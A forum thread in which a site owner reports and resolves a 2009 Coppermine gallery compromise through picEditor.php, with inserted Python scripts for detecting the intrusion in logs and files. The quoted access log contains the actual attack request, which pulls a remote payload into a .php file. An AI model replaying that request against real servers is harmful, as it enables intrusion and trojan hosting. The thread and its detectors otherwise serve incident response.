[Solved]: HACK: PHP Script Upload via picEditor.php

Started by Anderl, April 22, 2009, 01:08:31 PM

Anderl

Hi,

today (22nd of April, Germany) in the early morning somebody was able to upload and execute a PHP script by using picEditor.php.

Below is the code. The 65... IP is the original IP from which the script was executed. xx is my server IP.

65.182.208.101 - - [22/Apr/2009:04:40:37 +0200] "GET /gallery/picEditor.php HTTP/1.1" 200 8746 "-" "-"
65.182.208.101 - - [22/Apr/2009:04:40:41 +0200] "POST /gallery/picEditor.php?img_dir=http://ftp.tavr.kiev.ua/auto.txt&CURRENT_PIC[filename]=/9.php HTTP/1.1" 200 13249 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:44 +0200] "GET /forum/styles/AZ_ClassyDark/theme/core13046.php HTTP/1.0" 200 23064 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:44 +0200] "GET /gallery/themes/rainy_day/images/core13404.php HTTP/1.0" 200 68526 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:45 +0200] "GET /forum/styles/subsilver2/theme/images/core15355.php HTTP/1.0" 200 45790 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:45 +0200] "GET /cgi-bin/core13199.php HTTP/1.0" 200 17979 "-" "-"
xx.xx.xx.xx - - [22/Apr/2009:04:40:45 +0200] "GET /forum/styles/xandgrey/imageset/contrib/core16072.php HTTP/1.0" 200 23623 "-" "-"
65.182.208.101 - - [22/Apr/2009:04:40:45 +0200] "GET /gallery/albums/9.php HTTP/1.1" 200 632 "-" "-"


A file named 9.php was created (in the main directory) and executed. With this file they created files which include a Trojan. All files start with core*****.php, where ***** is a 5-digit random number.
One core file was stored in the cgi-bin directory of the main path. Several others are stored (I guess) by random access to other directories on the server.

They even created a .htaccess file (I found it in the userpics directory) which redirects all image paths from the main website to google.com...
I don't know why they made this redirection...
But only because of that did I see that something was wrong in the gallery, because no images were shown.
If they hadn't made this redirection... I think I wouldn't have found out what happened on my server. So it seems they made a mistake which was good for me.

I had a talk with my provider. He guessed that my website was only to be used to download the Trojan via iframes on other (hacked) websites. So in the end my website was only meant to be the "download area" for the Trojan...

I recommend that all gallery users check their installed galleries!

Also important: I even found a PHP file called S.php in the include folder of the gallery. It was uploaded earlier. Unfortunately I don't have the log files anymore. There is code inside S.php (it seems to send e-mail, maybe with a virus), but my virus scanner keeps silent... I sent this file to Avira for analysis. But in any case, this file is not a Coppermine file.

I hope that with this info it is possible to remove the security vulnerability and to protect other Coppermine users.

Regards

Anderl
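Detection logic for the access-log pattern in the post above, written as an added example (not code from Coppermine or from the poster): it flags a POST to picEditor.php that names a remote img_dir and a .php target filename, requests for core<5 digits>.php droppers, and a PHP file served from an album directory. The four sample lines are copied from the log excerpt above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined-log prefix: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+'
)

def classify(line):
    """Return alert tags for one access-log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path_query = urlsplit(m.group("target"))
    path, params = path_query.path, parse_qs(path_query.query)
    tags = []
    # The 1.4.19 picEditor.php accepted a remote img_dir and a caller-chosen target filename.
    if path.endswith("/picEditor.php") and m.group("method") == "POST":
        img_dir = params.get("img_dir", [""])[0].lower()
        target_name = params.get("CURRENT_PIC[filename]", [""])[0].lower()
        if img_dir.startswith(("http://", "https://", "ftp://")):
            tags.append("remote_img_dir")
        if target_name.endswith((".php", ".phtml", ".php5")):
            tags.append("php_filename")
    # Dropped loader scripts in the thread are named core<5 digits>.php.
    if re.search(r"/core\d{5}\.php$", path):
        tags.append("core_dropper")
    # Album/upload directories hold images only; a served .php there is a dropper or shell.
    if "/albums/" in path and path.endswith(".php") and m.group("status") == "200":
        tags.append("php_in_albums")
    return tags

# Four lines copied from the log excerpt in the post above (attacker IP as posted).
SAMPLE = [
    '65.182.208.101 - - [22/Apr/2009:04:40:37 +0200] "GET /gallery/picEditor.php HTTP/1.1" 200 8746 "-" "-"',
    '65.182.208.101 - - [22/Apr/2009:04:40:41 +0200] "POST /gallery/picEditor.php?img_dir=http://ftp.tavr.kiev.ua/auto.txt&CURRENT_PIC[filename]=/9.php HTTP/1.1" 200 13249 "-" "-"',
    'xx.xx.xx.xx - - [22/Apr/2009:04:40:44 +0200] "GET /forum/styles/AZ_ClassyDark/theme/core13046.php HTTP/1.0" 200 23064 "-" "-"',
    '65.182.208.101 - - [22/Apr/2009:04:40:45 +0200] "GET /gallery/albums/9.php HTTP/1.1" 200 632 "-" "-"',
]

def scan(lines):
    """Map line index -> tags for every line that triggered at least one rule."""
    hits = {}
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits[i] = tags
    return hits
```

Run `scan` over a full access log to find the initial upload request and the follow-up fetches of the dropped files in one pass.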


Hein Traag

Which version of cpg were you using? Did you read the Yikes sticky thread?

François Keller

Did you read the DOC? the FAQ? and search the board before posting?
My Blog

Anderl

... I just checked it. It is 1.4.19...
I tried to find some topics about attacks via picEditor.php but I found only some old posts. That's why I posted a new one.

I modified the gallery to use it with 3D (stereo) video clips. So in the end, if you click on an image, a file with the extension 3dccpl is opened. This file is associated with a 3D video player and opens a wmv file in the 3D player.

The modifications are made in some PHP files and my problem is that an update will overwrite the files. Is it possible just to install a new picEditor.php with the security changes, if they are made?

Anderl

P.S.

I have read the Yikes sticky thread. Of course I had a backup and the site is clean and running again. I just removed picEditor.php until the problem is solved. I am not a beginner but of course I am not a specialist for hacker attacks. So I really have to know if the problem will be solved with an update or not. In general the gallery is controlled only by me and no user registration is possible, so I do not need the normal user functions.

Maybe someone can explain to me the "POST" option which is shown above in the code? Is the "9.php" created with this function call or is it possible that the file already existed before?

Thank you

Anderl



Hein Traag

1.4.19 is your problem... it has a security flaw which was fixed by 1.4.20 and 1.4.21.

If you want your site cleaned use the Yikes thread and once you are done with that try and check regularly for updates.

Anderl

Thank you very much!

I installed 1.4.21 and made my changes to the PHP files again so that it is possible to open the 3D videos with the 3D player. Fortunately I only made changes in 3 files and style.css. :)

I also tried to upload and rename a text file as shown in the code above.
Now it returns a missing parameter message. Good :)

I really tried to find a thread with the problem about the old picEditor.php. I couldn't find it. I simply used "piceditor.php" in the forum search... Maybe you can combine the possible hacks with the names of the PHP files in one thread? This would be easier.

Anyway, thanks again, and I think that maybe now some more people will update immediately... ;)

Regards

Anderl


Joachim Müller

Installing the new version is not enough to sanitize your already-infected gallery. Hence the suggestion to read the Yikes thread and do as suggested there.
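A filesystem hunt for the artefacts described earlier in this thread (core<5 digits>.php droppers, PHP scripts under the album/userpics upload directories, a .htaccess that redirects to an external host), written as an added example; it is not code from the Coppermine project or from the Yikes thread, and the directory fixture is constructed for the demonstration.

```python
import os
import re
import tempfile

CORE_RE = re.compile(r"^core\d{5}\.php$", re.IGNORECASE)
# Upload directories hold images only; any PHP file below them is foreign.
UPLOAD_DIRS = {"albums", "userpics"}
# Apache directives that send a request to another host (the thread's .htaccess pointed at google.com).
REDIRECT_RE = re.compile(r"^\s*(Redirect(Match|Permanent)?|RewriteRule)\b.*https?://",
                         re.IGNORECASE | re.MULTILINE)

def hunt(root):
    """Walk a web root and return sorted (relative_path, reason) pairs for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        in_upload_dir = bool(UPLOAD_DIRS & set(rel_dir.split("/")))
        for name in files:
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            if CORE_RE.match(name):
                findings.append((rel, "core<5 digits>.php dropper name"))
            elif name.lower().endswith(".php") and in_upload_dir:
                findings.append((rel, "PHP script inside an upload directory"))
            elif name == ".htaccess":
                with open(os.path.join(dirpath, name), errors="replace") as fh:
                    if REDIRECT_RE.search(fh.read()):
                        findings.append((rel, ".htaccess redirects to an external host"))
    return sorted(findings)

def build_demo_tree():
    """Constructed fixture laid out the way the thread describes; not real server content."""
    root = tempfile.mkdtemp(prefix="cpg_hunt_")
    files = {
        "gallery/index.php": "<?php // legitimate gallery file\n",
        "gallery/albums/9.php": "<?php // dropped via the picEditor.php POST\n",
        "gallery/albums/userpics/.htaccess": "RedirectMatch (.*)\\.jpg$ http://google.com\n",
        "gallery/themes/rainy_day/images/core13404.php": "<?php // loader\n",
        "cgi-bin/core13199.php": "<?php // loader\n",
        "gallery/albums/photo.jpg": "placeholder image bytes\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root
```

Point `hunt` at the real document root rather than the fixture; the name patterns come from the log excerpt, so extend them with anything else found on the compromised host.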

Anderl

Hi Joachim,

I wrote before that I read the Yikes thread. It is useful, but I use a professional webspace. It means I pay a bit more, but I have a lot more functions and possibilities. I even wrote that I (my provider) had a clean backup.

This backup (function) doesn't overwrite files. The server is shut down, then all (and I mean all) files, folders etc. are deleted, and then the server is installed again from the backup files, because, as you can see in the code above, the infected files (core*****.php) are stored in several folders and not in the gallery.

After the backup I installed the new version of the gallery and checked picEditor.php to see if I could upload a txt file and store it with a PHP extension. It doesn't work. So this security vulnerability is really fixed.

I have also now created a .htaccess file with IPs which are on a blacklist (like spamhaus.org). All listed IPs are refused access to the website. Maybe you support a blacklist too? I mean that you create a thread with the known IPs of hackers and spammers which could easily be inserted (copy and paste) into a .htaccess file. I think it is in your interest too to make the Coppermine gallery as safe as possible.

If you agree, I can publish my collection :) of blacklisted IPs. Or I can publish the whole .htaccess file.

Regards

Anderl



Joachim Müller

I can't see how a blacklist is supposed to prevent hacking.

Anderl

???

It is not the blacklist! It is the .htaccess file with the IPs inside. If you have a look, for example, at

http://www.projecthoneypot.org/list_of_ips.php

then you will see that many IPs are used for a long time, because very often the attack comes from an already hacked network or server.

The listing of bad IPs is very quick now. It needs only hours to find them in the blacklists after the first attack or spamming. It is only a question of how often you check these lists and how often you update the .htaccess file.

It was just an idea, a suggestion to offer additional prevention against attacks. I do it on my server anyway.

Anderl

Small Update:

I wrote in my first posting about the file S.php. I sent this file to Avira for analysis. Here is the result. It is new malware!

S.php  112.06 KB  MALWARE
Name (given by Avira): PHP/Roxprov.A
It is a PHP script virus.
Detection will be included in one of the next updates of the VDF file from Avira.

Regards

Anderl

Hein Traag